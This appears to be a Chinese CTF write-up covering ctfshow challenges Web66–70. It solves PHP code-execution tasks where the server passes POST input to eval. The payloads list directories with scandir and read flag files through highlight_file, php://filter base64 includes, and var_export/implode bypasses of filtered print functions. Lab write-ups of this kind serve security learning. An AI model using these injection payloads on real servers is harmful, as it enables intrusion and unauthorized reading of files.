ctfshow(66->70)--RCE/命令执行漏洞--禁用命令执行函数

Web66

源代码:

复制代码
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

代码审计:

POST传参c,eval进行代码执行。

思路:

由于题目过滤了命令执行函数,所以使用其他方法进行RCE。

先使用c=var_dump(scandir("."))查看当前目录下的文件,发现了flag.php
highlight_file('flag.php')查看发现没有flag.

于是使用c=var_dump(scandir("/"))查看根目录,发现flag.txt

EXP:

复制代码
c=highlight_file('/flag.php');

得到flag.

Web67

与上一题做法相同。

Web68

进入界面,回显为一个报错:

代码审计:

说明highlight_file()函数被禁用了。

思路:

用php伪协议查看文件内容。

EXP:

复制代码
c=include($_POST[1]);&1=php://filter/convert.base64-encode/resource=/flag.txt

base64解码得到flag.

Web69

回显与上一题相同。

思路

查看目录下的文件:

复制代码
c=var_dump(scandir("/"));
c=print_r(scandir("/"));

发现两个打印函数都被过滤了。

替换为var_export或implode即可。

EXP:

查看目录:

复制代码
c=var_export(scandir("/"));
c=echo implode("--",scandir("/"));

读取文件内容:

复制代码
c=include("/flag.txt");

Web 70

与上一题做法相同。

相关推荐
九河云10 小时前
5秒开服,你的应用部署还卡在“加载中”吗?
大数据·人工智能·安全·机器学习·华为云
ShoreKiten11 小时前
ctfshowweb351-360
web安全·ssrf
枷锁—sha11 小时前
【SRC】SQL注入WAF 绕过应对策略(二)
网络·数据库·python·sql·安全·网络安全
桌面运维家12 小时前
vDisk安全启动策略怎么应用?防止恶意引导攻击
安全
我是一只puppy13 小时前
使用AI进行代码审查
javascript·人工智能·git·安全·源代码管理
白帽子凯哥哥14 小时前
湖南网安基地:国家级实战化网安人才培养的“黄埔军校”
web安全·信息安全·零基础·渗透测试·安全服务
迎仔14 小时前
10-网络安全监控与事件响应:数字世界的智能监控与应急系统
网络·安全·web安全
x-cmd18 小时前
[x-cmd] jsoup 1.22.1 版本发布,引入 re2j 引擎,让 HTML 解析更安全高效
前端·安全·html·x-cmd·jsoup
kali-Myon18 小时前
2025春秋杯网络安全联赛冬季赛-day2
python·安全·web安全·ai·php·pwn·ctf
独行soc18 小时前
2026年渗透测试面试题总结-19(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮